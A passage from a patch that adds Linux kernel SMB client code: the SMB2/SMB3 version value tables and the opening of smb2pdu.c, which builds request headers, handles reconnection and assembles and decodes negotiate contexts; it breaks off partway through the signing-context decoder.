++	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
++	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
++	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
++	.header_size = sizeof(struct smb2_hdr),
++	.header_preamble_size = 0,
++	.max_header_size = MAX_SMB2_HDR_SIZE,
++	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.lock_cmd = SMB2_LOCK,
++	.cap_unix = 0,
++	.cap_nt_find = SMB2_NT_FIND,
++	.cap_large_files = SMB2_LARGE_FILES,
++	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.create_lease_size = sizeof(struct create_lease_v2),
++};
++
++struct smb_version_values smb30_values = {
++	.version_string = SMB30_VERSION_STRING,
++	.protocol_id = SMB30_PROT_ID,
++	.req_capabilities = SMB2_GLOBAL_CAP_DFS | SMB2_GLOBAL_CAP_LEASING | SMB2_GLOBAL_CAP_LARGE_MTU | SMB2_GLOBAL_CAP_PERSISTENT_HANDLES | SMB2_GLOBAL_CAP_ENCRYPTION | SMB2_GLOBAL_CAP_DIRECTORY_LEASING,
++	.large_lock_type = 0,
++	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
++	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
++	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
++	.header_size = sizeof(struct smb2_hdr),
++	.header_preamble_size = 0,
++	.max_header_size = MAX_SMB2_HDR_SIZE,
++	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.lock_cmd = SMB2_LOCK,
++	.cap_unix = 0,
++	.cap_nt_find = SMB2_NT_FIND,
++	.cap_large_files = SMB2_LARGE_FILES,
++	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.create_lease_size = sizeof(struct create_lease_v2),
++};
++
++struct smb_version_values smb302_values = {
++	.version_string = SMB302_VERSION_STRING,
++	.protocol_id = SMB302_PROT_ID,
++	.req_capabilities = SMB2_GLOBAL_CAP_DFS | SMB2_GLOBAL_CAP_LEASING | SMB2_GLOBAL_CAP_LARGE_MTU | SMB2_GLOBAL_CAP_PERSISTENT_HANDLES | SMB2_GLOBAL_CAP_ENCRYPTION | SMB2_GLOBAL_CAP_DIRECTORY_LEASING,
++	.large_lock_type = 0,
++	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
++	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
++	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
++	.header_size = sizeof(struct smb2_hdr),
++	.header_preamble_size = 0,
++	.max_header_size = MAX_SMB2_HDR_SIZE,
++	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.lock_cmd = SMB2_LOCK,
++	.cap_unix = 0,
++	.cap_nt_find = SMB2_NT_FIND,
++	.cap_large_files = SMB2_LARGE_FILES,
++	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.create_lease_size = sizeof(struct create_lease_v2),
++};
++
++struct smb_version_values smb311_values = {
++	.version_string = SMB311_VERSION_STRING,
++	.protocol_id = SMB311_PROT_ID,
++	.req_capabilities = SMB2_GLOBAL_CAP_DFS | SMB2_GLOBAL_CAP_LEASING | SMB2_GLOBAL_CAP_LARGE_MTU | SMB2_GLOBAL_CAP_PERSISTENT_HANDLES | SMB2_GLOBAL_CAP_ENCRYPTION | SMB2_GLOBAL_CAP_DIRECTORY_LEASING,
++	.large_lock_type = 0,
++	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
++	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
++	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
++	.header_size = sizeof(struct smb2_hdr),
++	.header_preamble_size = 0,
++	.max_header_size = MAX_SMB2_HDR_SIZE,
++	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.lock_cmd = SMB2_LOCK,
++	.cap_unix = 0,
++	.cap_nt_find = SMB2_NT_FIND,
++	.cap_large_files = SMB2_LARGE_FILES,
++	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.create_lease_size = sizeof(struct create_lease_v2),
++};
+diff --git a/fs/smb/client/smb2pdu.c b/fs/smb/client/smb2pdu.c
+new file mode 100644
+index 0000000000000..3ca593cdda76e
+--- /dev/null
++++ b/fs/smb/client/smb2pdu.c
+@@ -0,0 +1,5722 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2009, 2013
++ *                 Etersoft, 2012
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *              Pavel Shilovsky (pshilovsky@samba.org) 2012
++ *
++ *   Contains the routines for constructing the SMB2 PDUs themselves
++ *
++ */
++
++ /* SMB2 PDU handling routines here - except for leftovers (eg session setup) */
++ /* Note that there are handle based routines which must be		      */
++ /* treated slightly differently for reconnection purposes since we never     */
++ /* want to reuse a stale file handle and only the caller knows the file info */
++
++#include <linux/fs.h>
++#include <linux/kernel.h>
++#include <linux/vfs.h>
++#include <linux/task_io_accounting_ops.h>
++#include <linux/uaccess.h>
++#include <linux/uuid.h>
++#include <linux/pagemap.h>
++#include <linux/xattr.h>
++#include "cifsglob.h"
++#include "cifsacl.h"
++#include "cifsproto.h"
++#include "smb2proto.h"
++#include "cifs_unicode.h"
++#include "cifs_debug.h"
++#include "ntlmssp.h"
++#include "smb2status.h"
++#include "smb2glob.h"
++#include "cifspdu.h"
++#include "cifs_spnego.h"
++#include "smbdirect.h"
++#include "trace.h"
++#ifdef CONFIG_CIFS_DFS_UPCALL
++#include "dfs_cache.h"
++#endif
++#include "cached_dir.h"
++
++/*
++ *  The following table defines the expected "StructureSize" of SMB2 requests
++ *  in order by SMB2 command.  This is similar to "wct" in SMB/CIFS requests.
++ *
++ *  Note that commands are defined in smb2pdu.h in le16 but the array below is
++ *  indexed by command in host byte order.
++ */
++static const int smb2_req_struct_sizes[NUMBER_OF_SMB2_COMMANDS] = {
++	/* SMB2_NEGOTIATE */ 36,
++	/* SMB2_SESSION_SETUP */ 25,
++	/* SMB2_LOGOFF */ 4,
++	/* SMB2_TREE_CONNECT */	9,
++	/* SMB2_TREE_DISCONNECT */ 4,
++	/* SMB2_CREATE */ 57,
++	/* SMB2_CLOSE */ 24,
++	/* SMB2_FLUSH */ 24,
++	/* SMB2_READ */	49,
++	/* SMB2_WRITE */ 49,
++	/* SMB2_LOCK */	48,
++	/* SMB2_IOCTL */ 57,
++	/* SMB2_CANCEL */ 4,
++	/* SMB2_ECHO */ 4,
++	/* SMB2_QUERY_DIRECTORY */ 33,
++	/* SMB2_CHANGE_NOTIFY */ 32,
++	/* SMB2_QUERY_INFO */ 41,
++	/* SMB2_SET_INFO */ 33,
++	/* SMB2_OPLOCK_BREAK */ 24 /* BB this is 36 for LEASE_BREAK variant */
++};
++
++int smb3_encryption_required(const struct cifs_tcon *tcon)
++{
++	if (!tcon || !tcon->ses)
++		return 0;
++	if ((tcon->ses->session_flags & SMB2_SESSION_FLAG_ENCRYPT_DATA) ||
++	    (tcon->share_flags & SHI1005_FLAGS_ENCRYPT_DATA))
++		return 1;
++	if (tcon->seal &&
++	    (tcon->ses->server->capabilities & SMB2_GLOBAL_CAP_ENCRYPTION))
++		return 1;
++	return 0;
++}
++
++static void
++smb2_hdr_assemble(struct smb2_hdr *shdr, __le16 smb2_cmd,
++		  const struct cifs_tcon *tcon,
++		  struct TCP_Server_Info *server)
++{
++	shdr->ProtocolId = SMB2_PROTO_NUMBER;
++	shdr->StructureSize = cpu_to_le16(64);
++	shdr->Command = smb2_cmd;
++	if (server) {
++		spin_lock(&server->req_lock);
++		/* Request up to 10 credits but don't go over the limit. */
++		if (server->credits >= server->max_credits)
++			shdr->CreditRequest = cpu_to_le16(0);
++		else
++			shdr->CreditRequest = cpu_to_le16(
++				min_t(int, server->max_credits -
++						server->credits, 10));
++		spin_unlock(&server->req_lock);
++	} else {
++		shdr->CreditRequest = cpu_to_le16(2);
++	}
++	shdr->Id.SyncId.ProcessId = cpu_to_le32((__u16)current->tgid);
++
++	if (!tcon)
++		goto out;
++
++	/* GLOBAL_CAP_LARGE_MTU will only be set if dialect > SMB2.02 */
++	/* See sections 2.2.4 and 3.2.4.1.5 of MS-SMB2 */
++	if (server && (server->capabilities & SMB2_GLOBAL_CAP_LARGE_MTU))
++		shdr->CreditCharge = cpu_to_le16(1);
++	/* else CreditCharge MBZ */
++
++	shdr->Id.SyncId.TreeId = cpu_to_le32(tcon->tid);
++	/* Uid is not converted */
++	if (tcon->ses)
++		shdr->SessionId = cpu_to_le64(tcon->ses->Suid);
++
++	/*
++	 * If we would set SMB2_FLAGS_DFS_OPERATIONS on open we also would have
++	 * to pass the path on the Open SMB prefixed by \\server\share.
++	 * Not sure when we would need to do the augmented path (if ever) and
++	 * setting this flag breaks the SMB2 open operation since it is
++	 * illegal to send an empty path name (without \\server\share prefix)
++	 * when the DFS flag is set in the SMB open header. We could
++	 * consider setting the flag on all operations other than open
++	 * but it is safer to net set it for now.
++	 */
++/*	if (tcon->share_flags & SHI1005_FLAGS_DFS)
++		shdr->Flags |= SMB2_FLAGS_DFS_OPERATIONS; */
++
++	if (server && server->sign && !smb3_encryption_required(tcon))
++		shdr->Flags |= SMB2_FLAGS_SIGNED;
++out:
++	return;
++}
++
++static int
++smb2_reconnect(__le16 smb2_command, struct cifs_tcon *tcon,
++	       struct TCP_Server_Info *server)
++{
++	int rc = 0;
++	struct nls_table *nls_codepage = NULL;
++	struct cifs_ses *ses;
++
++	/*
++	 * SMB2s NegProt, SessSetup, Logoff do not have tcon yet so
++	 * check for tcp and smb session status done differently
++	 * for those three - in the calling routine.
++	 */
++	if (tcon == NULL)
++		return 0;
++
++	/*
++	 * Need to also skip SMB2_IOCTL because it is used for checking nested dfs links in
++	 * cifs_tree_connect().
++	 */
++	if (smb2_command == SMB2_TREE_CONNECT || smb2_command == SMB2_IOCTL)
++		return 0;
++
++	spin_lock(&tcon->tc_lock);
++	if (tcon->status == TID_EXITING) {
++		/*
++		 * only tree disconnect allowed when disconnecting ...
++		 */
++		if (smb2_command != SMB2_TREE_DISCONNECT) {
++			spin_unlock(&tcon->tc_lock);
++			cifs_dbg(FYI, "can not send cmd %d while umounting\n",
++				 smb2_command);
++			return -ENODEV;
++		}
++	}
++	spin_unlock(&tcon->tc_lock);
++
++	ses = tcon->ses;
++	if (!ses)
++		return -EIO;
++	spin_lock(&ses->ses_lock);
++	if (ses->ses_status == SES_EXITING) {
++		spin_unlock(&ses->ses_lock);
++		return -EIO;
++	}
++	spin_unlock(&ses->ses_lock);
++	if (!ses->server || !server)
++		return -EIO;
++
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsNeedReconnect) {
++		/*
++		 * Return to caller for TREE_DISCONNECT and LOGOFF and CLOSE
++		 * here since they are implicitly done when session drops.
++		 */
++		switch (smb2_command) {
++		/*
++		 * BB Should we keep oplock break and add flush to exceptions?
++		 */
++		case SMB2_TREE_DISCONNECT:
++		case SMB2_CANCEL:
++		case SMB2_CLOSE:
++		case SMB2_OPLOCK_BREAK:
++			spin_unlock(&server->srv_lock);
++			return -EAGAIN;
++		}
++	}
++	spin_unlock(&server->srv_lock);
++
++again:
++	rc = cifs_wait_for_server_reconnect(server, tcon->retry);
++	if (rc)
++		return rc;
++
++	spin_lock(&ses->chan_lock);
++	if (!cifs_chan_needs_reconnect(ses, server) && !tcon->need_reconnect) {
++		spin_unlock(&ses->chan_lock);
++		return 0;
++	}
++	spin_unlock(&ses->chan_lock);
++	cifs_dbg(FYI, "sess reconnect mask: 0x%lx, tcon reconnect: %d",
++		 tcon->ses->chans_need_reconnect,
++		 tcon->need_reconnect);
++
++	mutex_lock(&ses->session_mutex);
++	/*
++	 * Recheck after acquire mutex. If another thread is negotiating
++	 * and the server never sends an answer the socket will be closed
++	 * and tcpStatus set to reconnect.
++	 */
++	spin_lock(&server->srv_lock);
++	if (server->tcpStatus == CifsNeedReconnect) {
++		spin_unlock(&server->srv_lock);
++		mutex_unlock(&ses->session_mutex);
++
++		if (tcon->retry)
++			goto again;
++
++		rc = -EHOSTDOWN;
++		goto out;
++	}
++	spin_unlock(&server->srv_lock);
++
++	nls_codepage = load_nls_default();
++
++	/*
++	 * need to prevent multiple threads trying to simultaneously
++	 * reconnect the same SMB session
++	 */
++	spin_lock(&ses->ses_lock);
++	spin_lock(&ses->chan_lock);
++	if (!cifs_chan_needs_reconnect(ses, server) &&
++	    ses->ses_status == SES_GOOD) {
++		spin_unlock(&ses->chan_lock);
++		spin_unlock(&ses->ses_lock);
++		/* this means that we only need to tree connect */
++		if (tcon->need_reconnect)
++			goto skip_sess_setup;
++
++		mutex_unlock(&ses->session_mutex);
++		goto out;
++	}
++	spin_unlock(&ses->chan_lock);
++	spin_unlock(&ses->ses_lock);
++
++	rc = cifs_negotiate_protocol(0, ses, server);
++	if (!rc) {
++		rc = cifs_setup_session(0, ses, server, nls_codepage);
++		if ((rc == -EACCES) && !tcon->retry) {
++			mutex_unlock(&ses->session_mutex);
++			rc = -EHOSTDOWN;
++			goto failed;
++		} else if (rc) {
++			mutex_unlock(&ses->session_mutex);
++			goto out;
++		}
++	} else {
++		mutex_unlock(&ses->session_mutex);
++		goto out;
++	}
++
++skip_sess_setup:
++	if (!tcon->need_reconnect) {
++		mutex_unlock(&ses->session_mutex);
++		goto out;
++	}
++	cifs_mark_open_files_invalid(tcon);
++	if (tcon->use_persistent)
++		tcon->need_reopen_files = true;
++
++	rc = cifs_tree_connect(0, tcon, nls_codepage);
++	mutex_unlock(&ses->session_mutex);
++
++	cifs_dbg(FYI, "reconnect tcon rc = %d\n", rc);
++	if (rc) {
++		/* If sess reconnected but tcon didn't, something strange ... */
++		cifs_dbg(VFS, "reconnect tcon failed rc = %d\n", rc);
++		goto out;
++	}
++
++	if (smb2_command != SMB2_INTERNAL_CMD)
++		mod_delayed_work(cifsiod_wq, &server->reconnect, 0);
++
++	atomic_inc(&tconInfoReconnectCount);
++out:
++	/*
++	 * Check if handle based operation so we know whether we can continue
++	 * or not without returning to caller to reset file handle.
++	 */
++	/*
++	 * BB Is flush done by server on drop of tcp session? Should we special
++	 * case it and skip above?
++	 */
++	switch (smb2_command) {
++	case SMB2_FLUSH:
++	case SMB2_READ:
++	case SMB2_WRITE:
++	case SMB2_LOCK:
++	case SMB2_IOCTL:
++	case SMB2_QUERY_DIRECTORY:
++	case SMB2_CHANGE_NOTIFY:
++	case SMB2_QUERY_INFO:
++	case SMB2_SET_INFO:
++		rc = -EAGAIN;
++	}
++failed:
++	unload_nls(nls_codepage);
++	return rc;
++}
++
++static void
++fill_small_buf(__le16 smb2_command, struct cifs_tcon *tcon,
++	       struct TCP_Server_Info *server,
++	       void *buf,
++	       unsigned int *total_len)
++{
++	struct smb2_pdu *spdu = buf;
++	/* lookup word count ie StructureSize from table */
++	__u16 parmsize = smb2_req_struct_sizes[le16_to_cpu(smb2_command)];
++
++	/*
++	 * smaller than SMALL_BUFFER_SIZE but bigger than fixed area of
++	 * largest operations (Create)
++	 */
++	memset(buf, 0, 256);
++
++	smb2_hdr_assemble(&spdu->hdr, smb2_command, tcon, server);
++	spdu->StructureSize2 = cpu_to_le16(parmsize);
++
++	*total_len = parmsize + sizeof(struct smb2_hdr);
++}
++
++/*
++ * Allocate and return pointer to an SMB request hdr, and set basic
++ * SMB information in the SMB header. If the return code is zero, this
++ * function must have filled in request_buf pointer.
++ */
++static int __smb2_plain_req_init(__le16 smb2_command, struct cifs_tcon *tcon,
++				 struct TCP_Server_Info *server,
++				 void **request_buf, unsigned int *total_len)
++{
++	/* BB eventually switch this to SMB2 specific small buf size */
++	if (smb2_command == SMB2_SET_INFO)
++		*request_buf = cifs_buf_get();
++	else
++		*request_buf = cifs_small_buf_get();
++	if (*request_buf == NULL) {
++		/* BB should we add a retry in here if not a writepage? */
++		return -ENOMEM;
++	}
++
++	fill_small_buf(smb2_command, tcon, server,
++		       (struct smb2_hdr *)(*request_buf),
++		       total_len);
++
++	if (tcon != NULL) {
++		uint16_t com_code = le16_to_cpu(smb2_command);
++		cifs_stats_inc(&tcon->stats.smb2_stats.smb2_com_sent[com_code]);
++		cifs_stats_inc(&tcon->num_smbs_sent);
++	}
++
++	return 0;
++}
++
++static int smb2_plain_req_init(__le16 smb2_command, struct cifs_tcon *tcon,
++			       struct TCP_Server_Info *server,
++			       void **request_buf, unsigned int *total_len)
++{
++	int rc;
++
++	rc = smb2_reconnect(smb2_command, tcon, server);
++	if (rc)
++		return rc;
++
++	return __smb2_plain_req_init(smb2_command, tcon, server, request_buf,
++				     total_len);
++}
++
++static int smb2_ioctl_req_init(u32 opcode, struct cifs_tcon *tcon,
++			       struct TCP_Server_Info *server,
++			       void **request_buf, unsigned int *total_len)
++{
++	/* Skip reconnect only for FSCTL_VALIDATE_NEGOTIATE_INFO IOCTLs */
++	if (opcode == FSCTL_VALIDATE_NEGOTIATE_INFO) {
++		return __smb2_plain_req_init(SMB2_IOCTL, tcon, server,
++					     request_buf, total_len);
++	}
++	return smb2_plain_req_init(SMB2_IOCTL, tcon, server,
++				   request_buf, total_len);
++}
++
++/* For explanation of negotiate contexts see MS-SMB2 section 2.2.3.1 */
++
++static void
++build_preauth_ctxt(struct smb2_preauth_neg_context *pneg_ctxt)
++{
++	pneg_ctxt->ContextType = SMB2_PREAUTH_INTEGRITY_CAPABILITIES;
++	pneg_ctxt->DataLength = cpu_to_le16(38);
++	pneg_ctxt->HashAlgorithmCount = cpu_to_le16(1);
++	pneg_ctxt->SaltLength = cpu_to_le16(SMB311_SALT_SIZE);
++	get_random_bytes(pneg_ctxt->Salt, SMB311_SALT_SIZE);
++	pneg_ctxt->HashAlgorithms = SMB2_PREAUTH_INTEGRITY_SHA512;
++}
++
++static void
++build_compression_ctxt(struct smb2_compression_capabilities_context *pneg_ctxt)
++{
++	pneg_ctxt->ContextType = SMB2_COMPRESSION_CAPABILITIES;
++	pneg_ctxt->DataLength =
++		cpu_to_le16(sizeof(struct smb2_compression_capabilities_context)
++			  - sizeof(struct smb2_neg_context));
++	pneg_ctxt->CompressionAlgorithmCount = cpu_to_le16(3);
++	pneg_ctxt->CompressionAlgorithms[0] = SMB3_COMPRESS_LZ77;
++	pneg_ctxt->CompressionAlgorithms[1] = SMB3_COMPRESS_LZ77_HUFF;
++	pneg_ctxt->CompressionAlgorithms[2] = SMB3_COMPRESS_LZNT1;
++}
++
++static unsigned int
++build_signing_ctxt(struct smb2_signing_capabilities *pneg_ctxt)
++{
++	unsigned int ctxt_len = sizeof(struct smb2_signing_capabilities);
++	unsigned short num_algs = 1; /* number of signing algorithms sent */
++
++	pneg_ctxt->ContextType = SMB2_SIGNING_CAPABILITIES;
++	/*
++	 * Context Data length must be rounded to multiple of 8 for some servers
++	 */
++	pneg_ctxt->DataLength = cpu_to_le16(ALIGN(sizeof(struct smb2_signing_capabilities) -
++					    sizeof(struct smb2_neg_context) +
++					    (num_algs * sizeof(u16)), 8));
++	pneg_ctxt->SigningAlgorithmCount = cpu_to_le16(num_algs);
++	pneg_ctxt->SigningAlgorithms[0] = cpu_to_le16(SIGNING_ALG_AES_CMAC);
++
++	ctxt_len += sizeof(__le16) * num_algs;
++	ctxt_len = ALIGN(ctxt_len, 8);
++	return ctxt_len;
++	/* TBD add SIGNING_ALG_AES_GMAC and/or SIGNING_ALG_HMAC_SHA256 */
++}
++
++static void
++build_encrypt_ctxt(struct smb2_encryption_neg_context *pneg_ctxt)
++{
++	pneg_ctxt->ContextType = SMB2_ENCRYPTION_CAPABILITIES;
++	if (require_gcm_256) {
++		pneg_ctxt->DataLength = cpu_to_le16(4); /* Cipher Count + 1 cipher */
++		pneg_ctxt->CipherCount = cpu_to_le16(1);
++		pneg_ctxt->Ciphers[0] = SMB2_ENCRYPTION_AES256_GCM;
++	} else if (enable_gcm_256) {
++		pneg_ctxt->DataLength = cpu_to_le16(8); /* Cipher Count + 3 ciphers */
++		pneg_ctxt->CipherCount = cpu_to_le16(3);
++		pneg_ctxt->Ciphers[0] = SMB2_ENCRYPTION_AES128_GCM;
++		pneg_ctxt->Ciphers[1] = SMB2_ENCRYPTION_AES256_GCM;
++		pneg_ctxt->Ciphers[2] = SMB2_ENCRYPTION_AES128_CCM;
++	} else {
++		pneg_ctxt->DataLength = cpu_to_le16(6); /* Cipher Count + 2 ciphers */
++		pneg_ctxt->CipherCount = cpu_to_le16(2);
++		pneg_ctxt->Ciphers[0] = SMB2_ENCRYPTION_AES128_GCM;
++		pneg_ctxt->Ciphers[1] = SMB2_ENCRYPTION_AES128_CCM;
++	}
++}
++
++static unsigned int
++build_netname_ctxt(struct smb2_netname_neg_context *pneg_ctxt, char *hostname)
++{
++	struct nls_table *cp = load_nls_default();
++
++	pneg_ctxt->ContextType = SMB2_NETNAME_NEGOTIATE_CONTEXT_ID;
++
++	/* copy up to max of first 100 bytes of server name to NetName field */
++	pneg_ctxt->DataLength = cpu_to_le16(2 * cifs_strtoUTF16(pneg_ctxt->NetName, hostname, 100, cp));
++	/* context size is DataLength + minimal smb2_neg_context */
++	return ALIGN(le16_to_cpu(pneg_ctxt->DataLength) + sizeof(struct smb2_neg_context), 8);
++}
++
++static void
++build_posix_ctxt(struct smb2_posix_neg_context *pneg_ctxt)
++{
++	pneg_ctxt->ContextType = SMB2_POSIX_EXTENSIONS_AVAILABLE;
++	pneg_ctxt->DataLength = cpu_to_le16(POSIX_CTXT_DATA_LEN);
++	/* SMB2_CREATE_TAG_POSIX is "0x93AD25509CB411E7B42383DE968BCD7C" */
++	pneg_ctxt->Name[0] = 0x93;
++	pneg_ctxt->Name[1] = 0xAD;
++	pneg_ctxt->Name[2] = 0x25;
++	pneg_ctxt->Name[3] = 0x50;
++	pneg_ctxt->Name[4] = 0x9C;
++	pneg_ctxt->Name[5] = 0xB4;
++	pneg_ctxt->Name[6] = 0x11;
++	pneg_ctxt->Name[7] = 0xE7;
++	pneg_ctxt->Name[8] = 0xB4;
++	pneg_ctxt->Name[9] = 0x23;
++	pneg_ctxt->Name[10] = 0x83;
++	pneg_ctxt->Name[11] = 0xDE;
++	pneg_ctxt->Name[12] = 0x96;
++	pneg_ctxt->Name[13] = 0x8B;
++	pneg_ctxt->Name[14] = 0xCD;
++	pneg_ctxt->Name[15] = 0x7C;
++}
++
++static void
++assemble_neg_contexts(struct smb2_negotiate_req *req,
++		      struct TCP_Server_Info *server, unsigned int *total_len)
++{
++	unsigned int ctxt_len, neg_context_count;
++	struct TCP_Server_Info *pserver;
++	char *pneg_ctxt;
++	char *hostname;
++
++	if (*total_len > 200) {
++		/* In case length corrupted don't want to overrun smb buffer */
++		cifs_server_dbg(VFS, "Bad frame length assembling neg contexts\n");
++		return;
++	}
++
++	/*
++	 * round up total_len of fixed part of SMB3 negotiate request to 8
++	 * byte boundary before adding negotiate contexts
++	 */
++	*total_len = ALIGN(*total_len, 8);
++
++	pneg_ctxt = (*total_len) + (char *)req;
++	req->NegotiateContextOffset = cpu_to_le32(*total_len);
++
++	build_preauth_ctxt((struct smb2_preauth_neg_context *)pneg_ctxt);
++	ctxt_len = ALIGN(sizeof(struct smb2_preauth_neg_context), 8);
++	*total_len += ctxt_len;
++	pneg_ctxt += ctxt_len;
++
++	build_encrypt_ctxt((struct smb2_encryption_neg_context *)pneg_ctxt);
++	ctxt_len = ALIGN(sizeof(struct smb2_encryption_neg_context), 8);
++	*total_len += ctxt_len;
++	pneg_ctxt += ctxt_len;
++
++	/*
++	 * secondary channels don't have the hostname field populated
++	 * use the hostname field in the primary channel instead
++	 */
++	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++	cifs_server_lock(pserver);
++	hostname = pserver->hostname;
++	if (hostname && (hostname[0] != 0)) {
++		ctxt_len = build_netname_ctxt((struct smb2_netname_neg_context *)pneg_ctxt,
++					      hostname);
++		*total_len += ctxt_len;
++		pneg_ctxt += ctxt_len;
++		neg_context_count = 3;
++	} else
++		neg_context_count = 2;
++	cifs_server_unlock(pserver);
++
++	build_posix_ctxt((struct smb2_posix_neg_context *)pneg_ctxt);
++	*total_len += sizeof(struct smb2_posix_neg_context);
++	pneg_ctxt += sizeof(struct smb2_posix_neg_context);
++	neg_context_count++;
++
++	if (server->compress_algorithm) {
++		build_compression_ctxt((struct smb2_compression_capabilities_context *)
++				pneg_ctxt);
++		ctxt_len = ALIGN(sizeof(struct smb2_compression_capabilities_context), 8);
++		*total_len += ctxt_len;
++		pneg_ctxt += ctxt_len;
++		neg_context_count++;
++	}
++
++	if (enable_negotiate_signing) {
++		ctxt_len = build_signing_ctxt((struct smb2_signing_capabilities *)
++				pneg_ctxt);
++		*total_len += ctxt_len;
++		pneg_ctxt += ctxt_len;
++		neg_context_count++;
++	}
++
++	/* check for and add transport_capabilities and signing capabilities */
++	req->NegotiateContextCount = cpu_to_le16(neg_context_count);
++
++}
++
++/* If invalid preauth context warn but use what we requested, SHA-512 */
++static void decode_preauth_context(struct smb2_preauth_neg_context *ctxt)
++{
++	unsigned int len = le16_to_cpu(ctxt->DataLength);
++
++	/*
++	 * Caller checked that DataLength remains within SMB boundary. We still
++	 * need to confirm that one HashAlgorithms member is accounted for.
++	 */
++	if (len < MIN_PREAUTH_CTXT_DATA_LEN) {
++		pr_warn_once("server sent bad preauth context\n");
++		return;
++	} else if (len < MIN_PREAUTH_CTXT_DATA_LEN + le16_to_cpu(ctxt->SaltLength)) {
++		pr_warn_once("server sent invalid SaltLength\n");
++		return;
++	}
++	if (le16_to_cpu(ctxt->HashAlgorithmCount) != 1)
++		pr_warn_once("Invalid SMB3 hash algorithm count\n");
++	if (ctxt->HashAlgorithms != SMB2_PREAUTH_INTEGRITY_SHA512)
++		pr_warn_once("unknown SMB3 hash algorithm\n");
++}
++
++static void decode_compress_ctx(struct TCP_Server_Info *server,
++			 struct smb2_compression_capabilities_context *ctxt)
++{
++	unsigned int len = le16_to_cpu(ctxt->DataLength);
++
++	/*
++	 * Caller checked that DataLength remains within SMB boundary. We still
++	 * need to confirm that one CompressionAlgorithms member is accounted
++	 * for.
++	 */
++	if (len < 10) {
++		pr_warn_once("server sent bad compression cntxt\n");
++		return;
++	}
++	if (le16_to_cpu(ctxt->CompressionAlgorithmCount) != 1) {
++		pr_warn_once("Invalid SMB3 compress algorithm count\n");
++		return;
++	}
++	if (le16_to_cpu(ctxt->CompressionAlgorithms[0]) > 3) {
++		pr_warn_once("unknown compression algorithm\n");
++		return;
++	}
++	server->compress_algorithm = ctxt->CompressionAlgorithms[0];
++}
++
++static int decode_encrypt_ctx(struct TCP_Server_Info *server,
++			      struct smb2_encryption_neg_context *ctxt)
++{
++	unsigned int len = le16_to_cpu(ctxt->DataLength);
++
++	cifs_dbg(FYI, "decode SMB3.11 encryption neg context of len %d\n", len);
++	/*
++	 * Caller checked that DataLength remains within SMB boundary. We still
++	 * need to confirm that one Cipher flexible array member is accounted
++	 * for.
++	 */
++	if (len < MIN_ENCRYPT_CTXT_DATA_LEN) {
++		pr_warn_once("server sent bad crypto ctxt len\n");
++		return -EINVAL;
++	}
++
++	if (le16_to_cpu(ctxt->CipherCount) != 1) {
++		pr_warn_once("Invalid SMB3.11 cipher count\n");
++		return -EINVAL;
++	}
++	cifs_dbg(FYI, "SMB311 cipher type:%d\n", le16_to_cpu(ctxt->Ciphers[0]));
++	if (require_gcm_256) {
++		if (ctxt->Ciphers[0] != SMB2_ENCRYPTION_AES256_GCM) {
++			cifs_dbg(VFS, "Server does not support requested encryption type (AES256 GCM)\n");
++			return -EOPNOTSUPP;
++		}
++	} else if (ctxt->Ciphers[0] == 0) {
++		/*
++		 * e.g. if server only supported AES256_CCM (very unlikely)
++		 * or server supported no encryption types or had all disabled.
++		 * Since GLOBAL_CAP_ENCRYPTION will be not set, in the case
++		 * in which mount requested encryption ("seal") checks later
++		 * on during tree connection will return proper rc, but if
++		 * seal not requested by client, since server is allowed to
++		 * return 0 to indicate no supported cipher, we can't fail here
++		 */
++		server->cipher_type = 0;
++		server->capabilities &= ~SMB2_GLOBAL_CAP_ENCRYPTION;
++		pr_warn_once("Server does not support requested encryption types\n");
++		return 0;
++	} else if ((ctxt->Ciphers[0] != SMB2_ENCRYPTION_AES128_CCM) &&
++		   (ctxt->Ciphers[0] != SMB2_ENCRYPTION_AES128_GCM) &&
++		   (ctxt->Ciphers[0] != SMB2_ENCRYPTION_AES256_GCM)) {
++		/* server returned a cipher we didn't ask for */
++		pr_warn_once("Invalid SMB3.11 cipher returned\n");
++		return -EINVAL;
++	}
++	server->cipher_type = ctxt->Ciphers[0];
++	server->capabilities |= SMB2_GLOBAL_CAP_ENCRYPTION;
++	return 0;
++}
++
++static void decode_signing_ctx(struct TCP_Server_Info *server,
++			       struct smb2_signing_capabilities *pctxt)
++{
++	unsigned int len = le16_to_cpu(pctxt->DataLength);
++
++	/*
++	 * Caller checked that DataLength remains within SMB boundary. We still
++	 * need to confirm that one SigningAlgorithms flexible array member is
++	 * accounted for.
++	 */
++	if ((len < 4) || (len > 16)) {
++		pr_warn_once("server sent bad signing negcontext\n");
++		return;
++	}
++	if (le16_to_cpu(pctxt->SigningAlgorithmCount) != 1) {
